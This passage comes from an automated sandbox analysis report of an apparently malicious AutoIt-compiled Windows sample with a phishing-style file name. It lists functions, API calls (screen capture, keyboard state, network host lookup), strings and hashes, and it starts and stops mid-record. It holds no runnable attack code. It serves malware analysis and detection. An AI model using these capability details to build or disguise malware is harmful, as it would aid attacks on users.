                                                        • Opcode Fuzzy Hash: 6517dba673d7d3ba53d1528558ed2a6edf495a9fc81ea92e5d8748dc474a8027
                                                        • Instruction Fuzzy Hash: 2661597194020AAFDF14DFA0DC48AAEBBB9FF05300F14C129E919A6291EB359A05CF60
                                                        Function 00A9762D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDC.USER32(00000000), ref: 00A976A2
                                                        • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00A976AE
                                                        • CreateCompatibleDC.GDI32(?), ref: 00A976BA
                                                        • SelectObject.GDI32(00000000,?), ref: 00A976C7
                                                        • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00A9771B
                                                        • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00A97757
                                                        • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00A9777B
                                                        • SelectObject.GDI32(00000006,?), ref: 00A97783
                                                        • DeleteObject.GDI32(?), ref: 00A9778C
                                                        • DeleteDC.GDI32(00000006), ref: 00A97793
                                                        • ReleaseDC.USER32(00000000,?), ref: 00A9779E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                        • String ID: (
                                                        • API String ID: 2598888154-3887548279
                                                        • Opcode ID: 91425b3063d6e0ef22b1812293aa45d69f70bee587aba70da0ad09438c6a0b66
                                                        • Instruction ID: 8022cbc718db04dfa557f9259cfa68563a32a6c10085f173a8888ea436f04730
                                                        • Opcode Fuzzy Hash: 91425b3063d6e0ef22b1812293aa45d69f70bee587aba70da0ad09438c6a0b66
                                                        • Instruction Fuzzy Hash: FB514875A04209EFCB15CFA8DC85EAEBBF9EF49310F14852DFA4A97250D731A8418B60
                                                        Function 00A8A0B5 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadStringW.USER32(00000066,?,00000FFF,00AAFB78), ref: 00A8A0FC
                                                          • Part of subcall function 00A27F41: _memmove.LIBCMT ref: 00A27F82
                                                        • LoadStringW.USER32(?,?,00000FFF,?), ref: 00A8A11E
                                                        • __swprintf.LIBCMT ref: 00A8A177
                                                        • __swprintf.LIBCMT ref: 00A8A190
                                                        • _wprintf.LIBCMT ref: 00A8A246
                                                        • _wprintf.LIBCMT ref: 00A8A264
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: LoadString__swprintf_wprintf$_memmove
                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                        • API String ID: 311963372-2391861430
                                                        • Opcode ID: 1c4342047dbd6c7e148d365801b14d5b0019dc76dba8e48ba985010347f26c3a
                                                        • Instruction ID: 93fb8c0a42a125076f0a6c54a4d5153a58c977ebdb04ae2a1ec2b4e43a8bc6ac
                                                        • Opcode Fuzzy Hash: 1c4342047dbd6c7e148d365801b14d5b0019dc76dba8e48ba985010347f26c3a
                                                        • Instruction Fuzzy Hash: 5E51AB72900219BADF15EBE4DE86EEEB778AF14300F104566F505720A1EB316F48CB61
                                                        Function 00A85217 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 72sleepwindowtimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • timeGetTime.WINMM ref: 00A8521C
                                                          • Part of subcall function 00A40719: timeGetTime.WINMM(?,753DB400,00A30FF9), ref: 00A4071D
                                                        • Sleep.KERNEL32(0000000A), ref: 00A85248
                                                        • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 00A8526C
                                                        • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00A8528E
                                                        • SetActiveWindow.USER32 ref: 00A852AD
                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00A852BB
                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00A852DA
                                                        • Sleep.KERNEL32(000000FA), ref: 00A852E5
                                                        • IsWindow.USER32 ref: 00A852F1
                                                        • EndDialog.USER32(00000000), ref: 00A85302
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                        • String ID: @U=u$BUTTON
                                                        • API String ID: 1194449130-2582809321
                                                        • Opcode ID: 0917308f0004161ff9b96366836ffc0f5efdc48dc6007abea6befa8de39e01c4
                                                        • Instruction ID: 256dffe3b9f6c3d6b38e6848ec4149f7506434bc03a2faa352805756e779236c
                                                        • Opcode Fuzzy Hash: 0917308f0004161ff9b96366836ffc0f5efdc48dc6007abea6befa8de39e01c4
                                                        • Instruction Fuzzy Hash: AC219670904B46AFE704FBF0EDC9A793BA9EB56396F041424F902891B1DB719C439B71
                                                        Function 00A26BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A40B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00A26C6C,?,00008000), ref: 00A40BB7
                                                          • Part of subcall function 00A248AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A248A1,?,?,00A237C0,?), ref: 00A248CE
                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00A26D0D
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00A26E5A
                                                          • Part of subcall function 00A259CD: _wcscpy.LIBCMT ref: 00A25A05
                                                          • Part of subcall function 00A4387D: _iswctype.LIBCMT ref: 00A43885
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                        • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                        • API String ID: 537147316-1018226102
                                                        • Opcode ID: b5d4d322936f448010f32b4cf29fd90f2294b9094c2cfe172697ee9d27b3c703
                                                        • Instruction ID: 2ee3ee844e879a9e98d95d4714f4a0813f40f91b5cae84401dbc93b943596a3c
                                                        • Opcode Fuzzy Hash: b5d4d322936f448010f32b4cf29fd90f2294b9094c2cfe172697ee9d27b3c703
                                                        • Instruction Fuzzy Hash: 5F02B2315083519FC714EF28DA81AAFBBF5BF99354F04492DF886972A1DB30DA49CB42
                                                        Function 00A245DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 00A245F9
                                                        • GetMenuItemCount.USER32(00AE6890), ref: 00A5D7CD
                                                        • GetMenuItemCount.USER32(00AE6890), ref: 00A5D87D
                                                        • GetCursorPos.USER32(?), ref: 00A5D8C1
                                                        • SetForegroundWindow.USER32(00000000), ref: 00A5D8CA
                                                        • TrackPopupMenuEx.USER32(00AE6890,00000000,?,00000000,00000000,00000000), ref: 00A5D8DD
                                                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00A5D8E9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                        • String ID:
                                                        • API String ID: 2751501086-0
                                                        • Opcode ID: c60ef947454722184b0aa505f75140006945d22b481cacbeecdc02d9388b8b61
                                                        • Instruction ID: 5afcd891f226276c299438b25673c65cf2fd8bd10d319fcd17dff3f5cb6586d7
                                                        • Opcode Fuzzy Hash: c60ef947454722184b0aa505f75140006945d22b481cacbeecdc02d9388b8b61
                                                        • Instruction Fuzzy Hash: 4E71F570641216BFEB34DF68DC85FAABF64FF09365F200226F915A61E1C7B16814DB90
                                                        Function 00AA10A5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00AA0038,?,?), ref: 00AA10BC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: BuffCharUpper
                                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                        • API String ID: 3964851224-909552448
                                                        • Opcode ID: e2f8dea56895eb1e3cbfac866c1dddc71bdb594754af7d31e96ab10cbcbad985
                                                        • Instruction ID: a21854f27c239650137ade8bcb03206cab8cc4cf6762fa27196330822c236662
                                                        • Opcode Fuzzy Hash: e2f8dea56895eb1e3cbfac866c1dddc71bdb594754af7d31e96ab10cbcbad985
                                                        • Instruction Fuzzy Hash: 72414A3455025AEFCF10EF94DA91EEE3724AF52340F104569FD925B291DB30AE1ACBA0
                                                        Function 00AA772A Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 101windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00AA77CD
                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00AA77D4
                                                        • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00AA77E7
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00AA77EF
                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 00AA77FA
                                                        • DeleteDC.GDI32(00000000), ref: 00AA7803
                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00AA780D
                                                        • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00AA7821
                                                        • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00AA782D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                        • String ID: @U=u$static
                                                        • API String ID: 2559357485-3553413495
                                                        • Opcode ID: aa5c4322651f3c57ede47383884d4e0c6cc83e81a3d71acf6a7274cbc959a53b
                                                        • Instruction ID: db12953a414b541825fbdbe17f2eea3a2b8b91da42dd2c63d4e8985de5a52a1c
                                                        • Opcode Fuzzy Hash: aa5c4322651f3c57ede47383884d4e0c6cc83e81a3d71acf6a7274cbc959a53b
                                                        • Instruction Fuzzy Hash: CA315832105216AFDF159FA4DC08FEB3B69EF0E321F110224FA55A60E0DB359862DBA4
                                                        Function 00A85569 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A27D2C: _memmove.LIBCMT ref: 00A27D66
                                                          • Part of subcall function 00A27A84: _memmove.LIBCMT ref: 00A27B0D
                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00A855D2
                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00A855E8
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A855F9
                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00A8560B
                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00A8561C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: SendString$_memmove
                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                        • API String ID: 2279737902-1007645807
                                                        • Opcode ID: 4c238b11dc92c5d83337ed94703222e1128a8f1a1e8bc4bc05fc52a34c7ce223
                                                        • Instruction ID: 7a1cda00f644a0a8d62bb25fc5a2a93a71ffc366c39d1c2138cdf55d797ab47d
                                                        • Opcode Fuzzy Hash: 4c238b11dc92c5d83337ed94703222e1128a8f1a1e8bc4bc05fc52a34c7ce223
                                                        • Instruction Fuzzy Hash: 5D119024D9016979D720B775DC4ADBF7A7DFFA1B00F44083AB802A60D1EA600E05C6A1
                                                        Function 00A848F3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                        • String ID: 0.0.0.0
                                                        • API String ID: 208665112-3771769585
                                                        • Opcode ID: 26cd2e7195e10d4bfe5d13274de8432486ec7e3548eafc0039662424e959b1eb
                                                        • Instruction ID: dd1c8b4446f4e988c56246fcbef0953c7cee50365eda5e75fb8581cb33259d87
                                                        • Opcode Fuzzy Hash: 26cd2e7195e10d4bfe5d13274de8432486ec7e3548eafc0039662424e959b1eb
                                                        • Instruction Fuzzy Hash: 1D11D235904116AFCB34FBA4DD0AEDB77BCDF89720F4401B6F44996091EF749A8287A1
                                                        Function 00A8D7F8 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A29997: __itow.LIBCMT ref: 00A299C2
                                                          • Part of subcall function 00A29997: __swprintf.LIBCMT ref: 00A29A0C
                                                        • CoInitialize.OLE32(00000000), ref: 00A8D855
                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00A8D8E8
                                                        • SHGetDesktopFolder.SHELL32(?), ref: 00A8D8FC
                                                        • CoCreateInstance.OLE32(00AB2D7C,00000000,00000001,00ADA89C,?), ref: 00A8D948
                                                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00A8D9B7
                                                        • CoTaskMemFree.OLE32(?,?), ref: 00A8DA0F
                                                        • _memset.LIBCMT ref: 00A8DA4C
                                                        • SHBrowseForFolderW.SHELL32(?), ref: 00A8DA88
                                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00A8DAAB
                                                        • CoTaskMemFree.OLE32(00000000), ref: 00A8DAB2
                                                        • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00A8DAE9
                                                        • CoUninitialize.OLE32(00000001,00000000), ref: 00A8DAEB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                        • String ID:
                                                        • API String ID: 1246142700-0
                                                        • Opcode ID: 58dabbd2c95b2197b609d43e859f21ea224adb3c3de2df204ef78cbafed5c2e3
                                                        • Instruction ID: e6695994f8e2e6c8a894a190f69dba37007a4e7adf24138dfedd1909e3b9e9dc
                                                        • Opcode Fuzzy Hash: 58dabbd2c95b2197b609d43e859f21ea224adb3c3de2df204ef78cbafed5c2e3
                                                        • Instruction Fuzzy Hash: 36B1FB75A00119AFDB04EFA8D988DAEBBB9FF49314F148469F509EB261DB30ED41CB50
                                                        Function 00A8052C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetKeyboardState.USER32(?), ref: 00A805A7
                                                        • SetKeyboardState.USER32(?), ref: 00A80612
                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00A80632
                                                        • GetKeyState.USER32(000000A0), ref: 00A80649
                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00A80678
                                                        • GetKeyState.USER32(000000A1), ref: 00A80689
                                                        • GetAsyncKeyState.USER32(00000011), ref: 00A806B5
                                                        • GetKeyState.USER32(00000011), ref: 00A806C3
                                                        • GetAsyncKeyState.USER32(00000012), ref: 00A806EC
                                                        • GetKeyState.USER32(00000012), ref: 00A806FA
                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00A80723
                                                        • GetKeyState.USER32(0000005B), ref: 00A80731
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: State$Async$Keyboard
                                                        • String ID:
                                                        • API String ID: 541375521-0
                                                        • Opcode ID: 9bef45cf49d68139135353215ab9217981dc64eaa48febb2bc30806abfc4a882
                                                        • Instruction ID: d12964db453d36cdb5bb3784aa4494797c1ab85c7af71d65c7ee641846a12f41
                                                        • Opcode Fuzzy Hash: 9bef45cf49d68139135353215ab9217981dc64eaa48febb2bc30806abfc4a882
                                                        • Instruction Fuzzy Hash: 5D51EC70A0478419FB79FBB08955FEABFB49F01380F08859DD5C2561C2EAA49B4CCF61
                                                        Function 00A7C72A Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDlgItem.USER32(?,00000001), ref: 00A7C746
                                                        • GetWindowRect.USER32(00000000,?), ref: 00A7C758
                                                        • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00A7C7B6
                                                        • GetDlgItem.USER32(?,00000002), ref: 00A7C7C1
                                                        • GetWindowRect.USER32(00000000,?), ref: 00A7C7D3
                                                        • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00A7C827
                                                        • GetDlgItem.USER32(?,000003E9), ref: 00A7C835
                                                        • GetWindowRect.USER32(00000000,?), ref: 00A7C846
                                                        • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00A7C889
                                                        • GetDlgItem.USER32(?,000003EA), ref: 00A7C897
                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00A7C8B4
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00A7C8C1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                        • String ID:
                                                        • API String ID: 3096461208-0
                                                        • Opcode ID: ae08a674128cf7e48e6981eddc99e231bee6d714ce8580d34fdc115009bc1dae
                                                        • Instruction ID: 090c1352a3abb1c6ab258efa89a220f15625b8173e3a89050c01b158a78e75fd
                                                        • Opcode Fuzzy Hash: ae08a674128cf7e48e6981eddc99e231bee6d714ce8580d34fdc115009bc1dae
                                                        • Instruction Fuzzy Hash: D1513E71B00205AFDB18CFA9DD89AAEBBBAEB89310F14C12DF51AD72D0D7709D018B50
                                                        Function 00A2201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A21B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00A22036,?,00000000,?,?,?,?,00A216CB,00000000,?), ref: 00A21B9A
                                                        • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00A220D3
                                                        • KillTimer.USER32(-00000001,?,?,?,?,00A216CB,00000000,?,?,00A21AE2,?,?), ref: 00A2216E
                                                        • DestroyAcceleratorTable.USER32(00000000), ref: 00A5BEF6
                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00A216CB,00000000,?,?,00A21AE2,?,?), ref: 00A5BF27
                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00A216CB,00000000,?,?,00A21AE2,?,?), ref: 00A5BF3E
                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00A216CB,00000000,?,?,00A21AE2,?,?), ref: 00A5BF5A
                                                        • DeleteObject.GDI32(00000000), ref: 00A5BF6C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
